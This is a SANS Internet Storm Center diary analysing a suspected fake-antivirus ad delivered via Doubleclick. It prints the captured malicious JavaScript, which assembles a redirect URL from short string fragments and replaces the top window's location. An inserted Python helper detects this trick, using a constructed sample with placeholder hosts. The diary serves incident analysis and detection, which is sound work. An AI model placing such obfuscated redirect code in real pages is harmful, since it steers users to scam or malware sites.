Possible Fake-AV Ads from Doubleclick Servers, (Mon, Nov 5th)


Reader James ran into a Fake AV ad delivered by Doubleclick. It is not clear if this is the result of a compromise of Doubleclick, or a paid ad that slipped through Doubleclick's content review process. James started out at a local newspaper web site that, like many others, features ads served by Doubleclick. Luckily, James used a proxy tool (Fiddler) to record the session. Here are some of the excerpts (slightly anonymized, with spaces inserted to avoid accidental clicks):

GET [...]
Accept-Encoding: gzip, deflate
Host: ad.doubleclick.net
Connection: Keep-Alive
Cookie: id=xxxxa||t=1352150000|et=730|cs=yyyy

The reply to this request was:

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 167
Date: Mon, 05 Nov 2012 22:32:59 GMT

document.write("<script type=\"text/javascript\" language=\"javascript\" src=\"http://inc cam paign.com/jsb.php?id=29585w=bt=ju=13\"><\/script>");document.write(



This is typical Doubleclick behaviour: the ad returns a reference to some JavaScript. At this point, this isn't suspicious yet. But let's see what we get back from inccampaign.com.

If we access the site with wget (faking the user agent), we get back:

http://inc cam paign.com/pr/b/29585.jpg . This is a harmless image advertising luxury watches (these days, of course, a luxury watch ad suggests a link to spamming).



James, on the other hand, got the following content back (I wasn't able to reproduce this):



document.write("<a href='http://pw brand.com' target='_blank'><img src='http://inccampaign.com/pr/b/29585.jpg' style='border:none' /></a>");

var url = "http:" + "//fav" + "ozek." + "info/" + "in.ph" + "p?q=8" + "/CEg1" + "rjwdE" + "mPDwt" + "BLw6u" + "Sk36+" + "lyOya" + "TxYF9" + "UkLXx" + "A==";

if (window != top) { top.location.replace(url) } else { window.location.replace(url) }



The content starts out very similar, but his copy included additional JavaScript that forwards the user to fav ozek.info. Note that the destination URL is assembled from short string fragments at runtime, so it never appears in one piece in the served script. The domain is fairly new (registered October 12, 2012) and registered through Privacyprotect.org. Right now, none of the domains is listed as malicious on VirusTotal.
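As an added example (not part of the original diary), here is a small Python triage helper for served ad scripts like the two captures above: it folds the string-concatenation trick back into a single URL, resolves what is passed to location.replace(), and lists the src= URLs the script writes into the page. The sample scripts are constructed to mirror the two replies, with placeholder hosts instead of the real domains.

```python
import re

# One JS string literal, single- or double-quoted, with backslash escapes allowed inside.
STR_LIT = re.compile(r"'((?:[^'\\]|\\.)*)'" + r'|"((?:[^"\\]|\\.)*)"')
# "var name = <expression>" up to the end of the statement.
VAR_ASSIGN = re.compile(r"\bvar\s+(\w+)\s*=\s*([^;\n]+)")
# Navigation sinks: location.replace(x), location.href = x, location = x (any window object).
LOCATION_SINK = re.compile(r"\blocation(?:\.href)?\s*(?:=(?!=)\s*|\.replace\s*\(\s*)([^;)\n]+)")
# src= attributes inside document.write()'d markup; quotes may be escaped as \" or \'.
SRC_ATTR = re.compile(r"""src=\\?["']?(https?://[^"'\\ >]+)""")


def join_literals(expr):
    """Fold 'a' + "b" + ... into one string. Returns (value, literal_count), or
    (None, 0) if the expression contains anything other than literals and '+'."""
    parts = STR_LIT.findall(expr)
    residue = STR_LIT.sub("", expr).replace("+", "").strip()
    if not parts or residue:
        return None, 0
    return "".join(single or double for single, double in parts), len(parts)


def analyze(js):
    """Summarise what a served ad script loads and where it would send the browser."""
    variables, obfuscated = {}, []
    for name, expr in VAR_ASSIGN.findall(js):
        value, count = join_literals(expr)
        if value is None:
            continue
        variables[name] = value
        # A URL assembled from several short literals is the concatenation trick seen in the capture.
        if count > 1 and value.startswith("http"):
            obfuscated.append(name)
    redirects = set()
    for arg in LOCATION_SINK.findall(js):
        arg = arg.strip()
        value, _ = join_literals(arg)
        target = value if value is not None else variables.get(arg)
        if target:
            redirects.add(target)
    return {"sources": SRC_ATTR.findall(js), "obfuscated_vars": obfuscated,
            "redirects": sorted(redirects)}


# Constructed samples modelled on the two replies in the diary; all hosts are placeholders.
BENIGN = r'document.write("<script type=\"text/javascript\" src=\"http://inccampaign.example/jsb.php?id=29585\"><\/script>");'
MALICIOUS = r"""document.write("<a href='http://pwbrand.example' target='_blank'><img src='http://inccampaign.example/pr/b/29585.jpg' style='border:none' /></a>");
var url = "http:" + "//red" + "irect" + ".exam" + "ple/i" + "n.php" + "?q=8/" + "CEg1+" + "AB==";
if (window != top) { top.location.replace(url) } else { window.location.replace(url) }"""

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN), ("malicious", MALICIOUS)):
        print(label, analyze(sample))
```

Feeding it the raw response bodies saved from a proxy session (Fiddler or similar) gives a quick first-pass on which ad scripts merely load a creative and which ones navigate the top window somewhere else.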



I am still digging deeper into this, but right now it looks at least suspicious. Let me know if you see similar issues with Doubleclick ads.



------

Johannes B. Ullrich, Ph.D.

SANS Technology Institute

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
